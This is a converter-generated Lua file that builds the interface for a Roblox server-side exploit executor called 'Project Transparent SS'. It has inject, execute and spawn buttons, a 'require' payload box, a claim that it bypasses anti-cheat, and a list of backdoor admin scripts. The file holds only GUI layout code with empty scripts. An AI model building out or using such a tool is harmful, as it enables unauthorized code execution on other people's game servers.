--[=[
 d888b  db    db d888888b      .d888b.      db      db    db  .d8b.  
88' Y8b 88    88   `88'        VP  `8D      88      88    88 d8' `8b 
88      88    88    88            odD'      88      88    88 88ooo88 
88  ooo 88    88    88          .88'        88      88    88 88~~~88 
88. ~8~ 88b  d88   .88.        j88.         88booo. 88b  d88 88   88    @uniquadev
 Y888P  ~Y8888P' Y888888P      888888D      Y88888P ~Y8888P' YP   YP  CONVERTER 
]=]

-- Instances: 185 | Scripts: 39 | Modules: 0 | Tags: 0
local G2L = {};

-- StarterGui.ScreenGui
G2L["1"] = Instance.new("ScreenGui", game:GetService("CoreGui"));
G2L["1"]["ZIndexBehavior"] = Enum.ZIndexBehavior.Sibling;


-- StarterGui.ScreenGui.Scanner
G2L["2"] = Instance.new("LocalScript", G2L["1"]);
G2L["2"]["Name"] = [[Scanner]];


-- StarterGui.ScreenGui.Frame
G2L["3"] = Instance.new("Frame", G2L["1"]);
G2L["3"]["BorderSizePixel"] = 0;
G2L["3"]["BackgroundColor3"] = Color3.fromRGB(85, 85, 85);
G2L["3"]["Size"] = UDim2.new(0, 407, 0, 296);
G2L["3"]["Position"] = UDim2.new(0.32772, 0, 0.28788, 0);
G2L["3"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3"]["BackgroundTransparency"] = 0.5;


-- StarterGui.ScreenGui.Frame.Dragify
G2L["4"] = Instance.new("LocalScript", G2L["3"]);
G2L["4"]["Name"] = [[Dragify]];


-- StarterGui.ScreenGui.Frame.UIStroke
G2L["5"] = Instance.new("UIStroke", G2L["3"]);



-- StarterGui.ScreenGui.Frame.Frame
G2L["6"] = Instance.new("Frame", G2L["3"]);
G2L["6"]["BorderSizePixel"] = 0;
G2L["6"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["6"]["Size"] = UDim2.new(0, 407, 0, 2);
G2L["6"]["Position"] = UDim2.new(0, 0, 0.11486, 0);
G2L["6"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.Frame
G2L["7"] = Instance.new("Frame", G2L["3"]);
G2L["7"]["BorderSizePixel"] = 0;
G2L["7"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["7"]["Size"] = UDim2.new(0, 3, 0, 262);
G2L["7"]["Position"] = UDim2.new(0.10565, 0, 0.11486, 0);
G2L["7"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);


-- StarterGui.ScreenGui.Frame.TextLabel
G2L["8"] = Instance.new("TextLabel", G2L["3"]);
G2L["8"]["TextWrapped"] = true;
G2L["8"]["BorderSizePixel"] = 0;
G2L["8"]["TextSize"] = 14;
G2L["8"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["8"]["TextScaled"] = true;
G2L["8"]["BackgroundColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["8"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["8"]["BackgroundTransparency"] = 1;
G2L["8"]["Size"] = UDim2.new(0, 407, 0, 34);
G2L["8"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["8"]["Text"] = [[Project Transparent SS]];


-- StarterGui.ScreenGui.Frame.TextLabel.UIStroke
G2L["9"] = Instance.new("UIStroke", G2L["8"]);



-- StarterGui.ScreenGui.Frame.page1
G2L["a"] = Instance.new("Frame", G2L["3"]);
G2L["a"]["BorderSizePixel"] = 0;
G2L["a"]["BackgroundColor3"] = Color3.fromRGB(91, 91, 91);
G2L["a"]["Size"] = UDim2.new(0, 361, 0, 260);
G2L["a"]["Position"] = UDim2.new(0.11302, 0, 0.12162, 0);
G2L["a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["a"]["Name"] = [[page1]];
G2L["a"]["BackgroundTransparency"] = 0.5;


-- StarterGui.ScreenGui.Frame.page1.ImageLabel
G2L["b"] = Instance.new("ImageLabel", G2L["a"]);
G2L["b"]["BorderSizePixel"] = 0;
G2L["b"]["BackgroundColor3"] = Color3.fromRGB(46, 46, 46);
-- [ERROR] cannot convert ImageContent, please report to "https://github.com/uniquadev/GuiToLuaConverter/issues"
G2L["b"]["Image"] = [[rbxasset://textures/ui/GuiImagePlaceholder.png]];
G2L["b"]["Size"] = UDim2.new(0, 100, 0, 100);
G2L["b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["b"]["BackgroundTransparency"] = 1;
G2L["b"]["Position"] = UDim2.new(0.02263, 0, 0.03066, 0);


-- StarterGui.ScreenGui.Frame.page1.ImageLabel.LocalScript
G2L["c"] = Instance.new("LocalScript", G2L["b"]);



-- StarterGui.ScreenGui.Frame.page1.ImageLabel.UIStroke
G2L["d"] = Instance.new("UIStroke", G2L["b"]);
G2L["d"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["d"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.page1.TextLabel
G2L["e"] = Instance.new("TextLabel", G2L["a"]);
G2L["e"]["TextWrapped"] = true;
G2L["e"]["BorderSizePixel"] = 0;
G2L["e"]["TextSize"] = 14;
G2L["e"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["e"]["TextScaled"] = true;
G2L["e"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["e"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["e"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["e"]["BackgroundTransparency"] = 1;
G2L["e"]["Size"] = UDim2.new(0, 245, 0, 25);
G2L["e"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["e"]["Text"] = [[Welcome, player]];
G2L["e"]["Position"] = UDim2.new(0.32133, 0, 0.02692, 0);


-- StarterGui.ScreenGui.Frame.page1.TextLabel.LocalScript
G2L["f"] = Instance.new("LocalScript", G2L["e"]);



-- StarterGui.ScreenGui.Frame.page1.TextLabel.UIStroke
G2L["10"] = Instance.new("UIStroke", G2L["e"]);



-- StarterGui.ScreenGui.Frame.page1.TextLabel
G2L["11"] = Instance.new("TextLabel", G2L["a"]);
G2L["11"]["TextWrapped"] = true;
G2L["11"]["BorderSizePixel"] = 0;
G2L["11"]["TextSize"] = 14;
G2L["11"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["11"]["TextScaled"] = true;
G2L["11"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["11"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["11"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["11"]["BackgroundTransparency"] = 1;
G2L["11"]["Size"] = UDim2.new(0, 245, 0, 75);
G2L["11"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["11"]["Text"] = [[This is a rework of CTRL SS]];
G2L["11"]["Position"] = UDim2.new(0.32133, 0, 0.12308, 0);


-- StarterGui.ScreenGui.Frame.page1.TextLabel.UIStroke
G2L["12"] = Instance.new("UIStroke", G2L["11"]);



-- StarterGui.ScreenGui.Frame.page1.TextLabel
G2L["13"] = Instance.new("TextLabel", G2L["a"]);
G2L["13"]["TextWrapped"] = true;
G2L["13"]["BorderSizePixel"] = 0;
G2L["13"]["TextSize"] = 14;
G2L["13"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["13"]["TextScaled"] = true;
G2L["13"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["13"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["13"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["13"]["BackgroundTransparency"] = 1;
G2L["13"]["Size"] = UDim2.new(0, 353, 0, 34);
G2L["13"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["13"]["Text"] = [[Now a more advanced scanner!]];
G2L["13"]["Position"] = UDim2.new(0.02216, 0, 0.44615, 0);


-- StarterGui.ScreenGui.Frame.page1.TextLabel.UIStroke
G2L["14"] = Instance.new("UIStroke", G2L["13"]);



-- StarterGui.ScreenGui.Frame.page1.TextLabel
G2L["15"] = Instance.new("TextLabel", G2L["a"]);
G2L["15"]["TextWrapped"] = true;
G2L["15"]["BorderSizePixel"] = 0;
G2L["15"]["TextSize"] = 14;
G2L["15"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["15"]["TextScaled"] = true;
G2L["15"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["15"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["15"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["15"]["BackgroundTransparency"] = 1;
G2L["15"]["Size"] = UDim2.new(0, 353, 0, 34);
G2L["15"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["15"]["Text"] = [[Updated to bypass anticheats]];
G2L["15"]["Position"] = UDim2.new(0.02216, 0, 0.57692, 0);


-- StarterGui.ScreenGui.Frame.page1.TextLabel.UIStroke
G2L["16"] = Instance.new("UIStroke", G2L["15"]);



-- StarterGui.ScreenGui.Frame.page1.Status
G2L["17"] = Instance.new("TextLabel", G2L["a"]);
G2L["17"]["TextWrapped"] = true;
G2L["17"]["BorderSizePixel"] = 0;
G2L["17"]["TextSize"] = 14;
G2L["17"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["17"]["TextScaled"] = true;
G2L["17"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["17"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["17"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["17"]["BackgroundTransparency"] = 1;
G2L["17"]["Size"] = UDim2.new(0, 353, 0, 34);
G2L["17"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["17"]["Text"] = [[Status: NOT Injected]];
G2L["17"]["Name"] = [[Status]];
G2L["17"]["Position"] = UDim2.new(0.02216, 0, 0.70769, 0);


-- StarterGui.ScreenGui.Frame.page1.Status.UIStroke
G2L["18"] = Instance.new("UIStroke", G2L["17"]);



-- StarterGui.ScreenGui.Frame.page2
G2L["19"] = Instance.new("Frame", G2L["3"]);
G2L["19"]["Visible"] = false;
G2L["19"]["BorderSizePixel"] = 0;
G2L["19"]["BackgroundColor3"] = Color3.fromRGB(91, 91, 91);
G2L["19"]["Size"] = UDim2.new(0, 361, 0, 260);
G2L["19"]["Position"] = UDim2.new(0.11302, 0, 0.12162, 0);
G2L["19"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["19"]["Name"] = [[page2]];
G2L["19"]["BackgroundTransparency"] = 0.5;


-- StarterGui.ScreenGui.Frame.page2.Text
G2L["1a"] = Instance.new("ScrollingFrame", G2L["19"]);
G2L["1a"]["Active"] = true;
G2L["1a"]["BorderSizePixel"] = 0;
G2L["1a"]["CanvasSize"] = UDim2.new(0, 0, 0, 0);
G2L["1a"]["BackgroundColor3"] = Color3.fromRGB(113, 113, 113);
G2L["1a"]["Name"] = [[Text]];
G2L["1a"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["1a"]["Size"] = UDim2.new(1, 0, 0.83077, 0);
G2L["1a"]["ScrollBarImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1a"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1a"]["ScrollBarThickness"] = 2;
G2L["1a"]["BackgroundTransparency"] = 0.5;


-- StarterGui.ScreenGui.Frame.page2.Text.LocalScript
G2L["1b"] = Instance.new("LocalScript", G2L["1a"]);



-- StarterGui.ScreenGui.Frame.page2.Text.UIStroke
G2L["1c"] = Instance.new("UIStroke", G2L["1a"]);



-- StarterGui.ScreenGui.Frame.page2.Text.TextLabel
G2L["1d"] = Instance.new("TextLabel", G2L["1a"]);
G2L["1d"]["LineHeight"] = 1.01;
G2L["1d"]["BorderSizePixel"] = 0;
G2L["1d"]["TextSize"] = 14;
G2L["1d"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["1d"]["BackgroundColor3"] = Color3.fromRGB(75, 75, 75);
G2L["1d"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["1d"]["TextColor3"] = Color3.fromRGB(191, 191, 191);
G2L["1d"]["BackgroundTransparency"] = 0.5;
G2L["1d"]["Size"] = UDim2.new(0, 28, 0, 216);
G2L["1d"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["1d"]["Text"] = [[1]];
G2L["1d"]["AutomaticSize"] = Enum.AutomaticSize.Y;
G2L["1d"]["Position"] = UDim2.new(0, 0, -0.00477, 0);


-- StarterGui.ScreenGui.Frame.page2.Text.TextLabel.y
G2L["1e"] = Instance.new("UIStroke", G2L["1d"]);
G2L["1e"]["Name"] = [[y]];


-- StarterGui.ScreenGui.Frame.page2.Text.TextLabel.UIStroke
G2L["1f"] = Instance.new("UIStroke", G2L["1d"]);
G2L["1f"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page2.Text.TextBox
G2L["20"] = Instance.new("TextBox", G2L["1a"]);
G2L["20"]["LineHeight"] = 1.01;
G2L["20"]["TextXAlignment"] = Enum.TextXAlignment.Left;
G2L["20"]["PlaceholderColor3"] = Color3.fromRGB(255, 255, 255);
G2L["20"]["BorderSizePixel"] = 0;
G2L["20"]["TextSize"] = 14;
G2L["20"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["20"]["TextYAlignment"] = Enum.TextYAlignment.Top;
G2L["20"]["BackgroundColor3"] = Color3.fromRGB(101, 101, 101);
G2L["20"]["RichText"] = true;
G2L["20"]["FontFace"] = Font.new([[rbxasset://fonts/families/ComicNeueAngular.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["20"]["AutomaticSize"] = Enum.AutomaticSize.Y;
G2L["20"]["MultiLine"] = true;
G2L["20"]["ClearTextOnFocus"] = false;
G2L["20"]["PlaceholderText"] = [[-- require here]];
G2L["20"]["Size"] = UDim2.new(0, 332, 0, 216);
G2L["20"]["Position"] = UDim2.new(0.07756, 0, -0.00477, 0);
G2L["20"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["20"]["Text"] = [[]];
G2L["20"]["BackgroundTransparency"] = 0.5;


-- StarterGui.ScreenGui.Frame.page2.Text.TextBox.LocalScript
G2L["21"] = Instance.new("LocalScript", G2L["20"]);



-- StarterGui.ScreenGui.Frame.page2.Text.TextBox.Completor
G2L["22"] = Instance.new("LocalScript", G2L["20"]);
G2L["22"]["Name"] = [[Completor]];


-- StarterGui.ScreenGui.Frame.page2.Text.TextBox.LocalScript
G2L["23"] = Instance.new("LocalScript", G2L["20"]);



-- StarterGui.ScreenGui.Frame.page2.Text.TextBox.UIStroke
G2L["24"] = Instance.new("UIStroke", G2L["20"]);
G2L["24"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["24"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.page2.Text.TextBox.y
G2L["25"] = Instance.new("UIStroke", G2L["20"]);
G2L["25"]["Name"] = [[y]];


-- StarterGui.ScreenGui.Frame.page2.Execute
G2L["26"] = Instance.new("TextButton", G2L["19"]);
G2L["26"]["TextWrapped"] = true;
G2L["26"]["BorderSizePixel"] = 0;
G2L["26"]["TextSize"] = 14;
G2L["26"]["TextScaled"] = true;
G2L["26"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["26"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["26"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["26"]["BackgroundTransparency"] = 1;
G2L["26"]["Size"] = UDim2.new(0, 89, 0, 41);
G2L["26"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["26"]["Text"] = [[Execute]];
G2L["26"]["Name"] = [[Execute]];
G2L["26"]["Position"] = UDim2.new(0, 0, 0.83846, 0);


-- StarterGui.ScreenGui.Frame.page2.Execute.UIStroke
G2L["27"] = Instance.new("UIStroke", G2L["26"]);



-- StarterGui.ScreenGui.Frame.page2.Execute.UIStroke
G2L["28"] = Instance.new("UIStroke", G2L["26"]);
G2L["28"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["28"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.page2.Clear
G2L["29"] = Instance.new("TextButton", G2L["19"]);
G2L["29"]["TextWrapped"] = true;
G2L["29"]["BorderSizePixel"] = 0;
G2L["29"]["TextSize"] = 14;
G2L["29"]["TextScaled"] = true;
G2L["29"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["29"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["29"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["29"]["BackgroundTransparency"] = 1;
G2L["29"]["Size"] = UDim2.new(0, 94, 0, 41);
G2L["29"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["29"]["Text"] = [[Clear]];
G2L["29"]["Name"] = [[Clear]];
G2L["29"]["Position"] = UDim2.new(0.24654, 0, 0.83846, 0);


-- StarterGui.ScreenGui.Frame.page2.Clear.UIStroke
G2L["2a"] = Instance.new("UIStroke", G2L["29"]);



-- StarterGui.ScreenGui.Frame.page2.Clear.UIStroke
G2L["2b"] = Instance.new("UIStroke", G2L["29"]);
G2L["2b"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["2b"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.page2.Inject
G2L["2c"] = Instance.new("TextButton", G2L["19"]);
G2L["2c"]["TextWrapped"] = true;
G2L["2c"]["BorderSizePixel"] = 0;
G2L["2c"]["TextSize"] = 14;
G2L["2c"]["TextScaled"] = true;
G2L["2c"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2c"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2c"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2c"]["BackgroundTransparency"] = 1;
G2L["2c"]["Size"] = UDim2.new(0, 75, 0, 41);
G2L["2c"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2c"]["Text"] = [[Attach]];
G2L["2c"]["Name"] = [[Inject]];
G2L["2c"]["Position"] = UDim2.new(0.50693, 0, 0.83846, 0);


-- StarterGui.ScreenGui.Frame.page2.Inject.UIStroke
G2L["2d"] = Instance.new("UIStroke", G2L["2c"]);



-- StarterGui.ScreenGui.Frame.page2.Inject.UIStroke
G2L["2e"] = Instance.new("UIStroke", G2L["2c"]);
G2L["2e"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["2e"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.page2.RE
G2L["2f"] = Instance.new("TextButton", G2L["19"]);
G2L["2f"]["TextWrapped"] = true;
G2L["2f"]["BorderSizePixel"] = 0;
G2L["2f"]["TextSize"] = 14;
G2L["2f"]["TextScaled"] = true;
G2L["2f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["2f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["2f"]["BackgroundTransparency"] = 1;
G2L["2f"]["Size"] = UDim2.new(0, 58, 0, 41);
G2L["2f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["2f"]["Text"] = [[SPAWN]];
G2L["2f"]["Name"] = [[RE]];
G2L["2f"]["Position"] = UDim2.new(0.71468, 0, 0.83846, 0);


-- StarterGui.ScreenGui.Frame.page2.RE.UIStroke
G2L["30"] = Instance.new("UIStroke", G2L["2f"]);



-- StarterGui.ScreenGui.Frame.page2.RE.UIStroke
G2L["31"] = Instance.new("UIStroke", G2L["2f"]);
G2L["31"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["31"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.page2.R6
G2L["32"] = Instance.new("TextButton", G2L["19"]);
G2L["32"]["TextWrapped"] = true;
G2L["32"]["BorderSizePixel"] = 0;
G2L["32"]["TextSize"] = 14;
G2L["32"]["TextScaled"] = true;
G2L["32"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["32"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["32"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["32"]["BackgroundTransparency"] = 1;
G2L["32"]["Size"] = UDim2.new(0, 44, 0, 41);
G2L["32"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["32"]["Text"] = [[R6]];
G2L["32"]["Name"] = [[R6]];
G2L["32"]["Position"] = UDim2.new(0.87535, 0, 0.83846, 0);


-- StarterGui.ScreenGui.Frame.page2.R6.UIStroke
G2L["33"] = Instance.new("UIStroke", G2L["32"]);



-- StarterGui.ScreenGui.Frame.page2.R6.UIStroke
G2L["34"] = Instance.new("UIStroke", G2L["32"]);
G2L["34"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;
G2L["34"]["Thickness"] = 2;


-- StarterGui.ScreenGui.Frame.page3
G2L["35"] = Instance.new("Frame", G2L["3"]);
G2L["35"]["Visible"] = false;
G2L["35"]["BorderSizePixel"] = 0;
G2L["35"]["BackgroundColor3"] = Color3.fromRGB(91, 91, 91);
G2L["35"]["Size"] = UDim2.new(0, 361, 0, 260);
G2L["35"]["Position"] = UDim2.new(0.11302, 0, 0.12162, 0);
G2L["35"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["35"]["Name"] = [[page3]];
G2L["35"]["BackgroundTransparency"] = 0.5;


-- StarterGui.ScreenGui.Frame.page3.TextLabel
G2L["36"] = Instance.new("TextLabel", G2L["35"]);
G2L["36"]["TextWrapped"] = true;
G2L["36"]["BorderSizePixel"] = 0;
G2L["36"]["TextSize"] = 14;
G2L["36"]["TextScaled"] = true;
G2L["36"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["36"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["36"]["TextColor3"] = Color3.fromRGB(171, 255, 0);
G2L["36"]["BackgroundTransparency"] = 1;
G2L["36"]["Size"] = UDim2.new(0, 361, 0, 29);
G2L["36"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["36"]["Text"] = [[Scripts (SERVER-SIDE)]];


-- StarterGui.ScreenGui.Frame.page3.TextLabel.UIStroke
G2L["37"] = Instance.new("UIStroke", G2L["36"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame
G2L["38"] = Instance.new("ScrollingFrame", G2L["35"]);
G2L["38"]["Active"] = true;
G2L["38"]["BorderSizePixel"] = 0;
G2L["38"]["CanvasSize"] = UDim2.new(0, 0, 0, 0);
G2L["38"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["38"]["AutomaticCanvasSize"] = Enum.AutomaticSize.Y;
G2L["38"]["Size"] = UDim2.new(0, 361, 0, 231);
G2L["38"]["ScrollBarImageColor3"] = Color3.fromRGB(0, 0, 0);
G2L["38"]["Position"] = UDim2.new(0, 0, 0.11154, 0);
G2L["38"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["38"]["ScrollBarThickness"] = 3;
G2L["38"]["BackgroundTransparency"] = 11;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.UIStroke
G2L["39"] = Instance.new("UIStroke", G2L["38"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.UIListLayout
G2L["3a"] = Instance.new("UIListLayout", G2L["38"]);
G2L["3a"]["Padding"] = UDim.new(0, 1);
G2L["3a"]["SortOrder"] = Enum.SortOrder.LayoutOrder;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["3b"] = Instance.new("TextButton", G2L["38"]);
G2L["3b"]["TextWrapped"] = true;
G2L["3b"]["BorderSizePixel"] = 0;
G2L["3b"]["TextSize"] = 14;
G2L["3b"]["TextScaled"] = true;
G2L["3b"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3b"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3b"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["3b"]["BackgroundTransparency"] = 1;
G2L["3b"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["3b"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3b"]["Text"] = [[c00lgui]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["3c"] = Instance.new("LocalScript", G2L["3b"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["3d"] = Instance.new("UIStroke", G2L["3b"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["3e"] = Instance.new("UIStroke", G2L["3b"]);
G2L["3e"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["3f"] = Instance.new("TextButton", G2L["38"]);
G2L["3f"]["TextWrapped"] = true;
G2L["3f"]["BorderSizePixel"] = 0;
G2L["3f"]["TextSize"] = 14;
G2L["3f"]["TextScaled"] = true;
G2L["3f"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3f"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["3f"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["3f"]["BackgroundTransparency"] = 1;
G2L["3f"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["3f"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["3f"]["Text"] = [[DEX SS]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["40"] = Instance.new("LocalScript", G2L["3f"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["41"] = Instance.new("UIStroke", G2L["3f"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["42"] = Instance.new("UIStroke", G2L["3f"]);
G2L["42"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["43"] = Instance.new("TextButton", G2L["38"]);
G2L["43"]["TextWrapped"] = true;
G2L["43"]["BorderSizePixel"] = 0;
G2L["43"]["TextSize"] = 14;
G2L["43"]["TextScaled"] = true;
G2L["43"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["43"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["43"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["43"]["BackgroundTransparency"] = 1;
G2L["43"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["43"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["43"]["Text"] = [[HD Admin]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["44"] = Instance.new("LocalScript", G2L["43"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["45"] = Instance.new("UIStroke", G2L["43"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["46"] = Instance.new("UIStroke", G2L["43"]);
G2L["46"]["ApplyStrokeMode"] = Enum.ApplyStrokeMode.Border;


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton
G2L["47"] = Instance.new("TextButton", G2L["38"]);
G2L["47"]["TextWrapped"] = true;
G2L["47"]["BorderSizePixel"] = 0;
G2L["47"]["TextSize"] = 14;
G2L["47"]["TextScaled"] = true;
G2L["47"]["TextColor3"] = Color3.fromRGB(255, 255, 255);
G2L["47"]["BackgroundColor3"] = Color3.fromRGB(255, 255, 255);
G2L["47"]["FontFace"] = Font.new([[rbxasset://fonts/families/SourceSansPro.json]], Enum.FontWeight.Regular, Enum.FontStyle.Normal);
G2L["47"]["BackgroundTransparency"] = 1;
G2L["47"]["Size"] = UDim2.new(0, 361, 0, 33);
G2L["47"]["BorderColor3"] = Color3.fromRGB(0, 0, 0);
G2L["47"]["Text"] = [[k00pGUI]];


-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.LocalScript
G2L["48"] = Instance.new("LocalScript", G2L["47"]);



-- StarterGui.ScreenGui.Frame.page3.ScrollingFrame.TextButton.UIStroke
G2L["49"] = Instance.new("UIStroke", G2L["47"]);



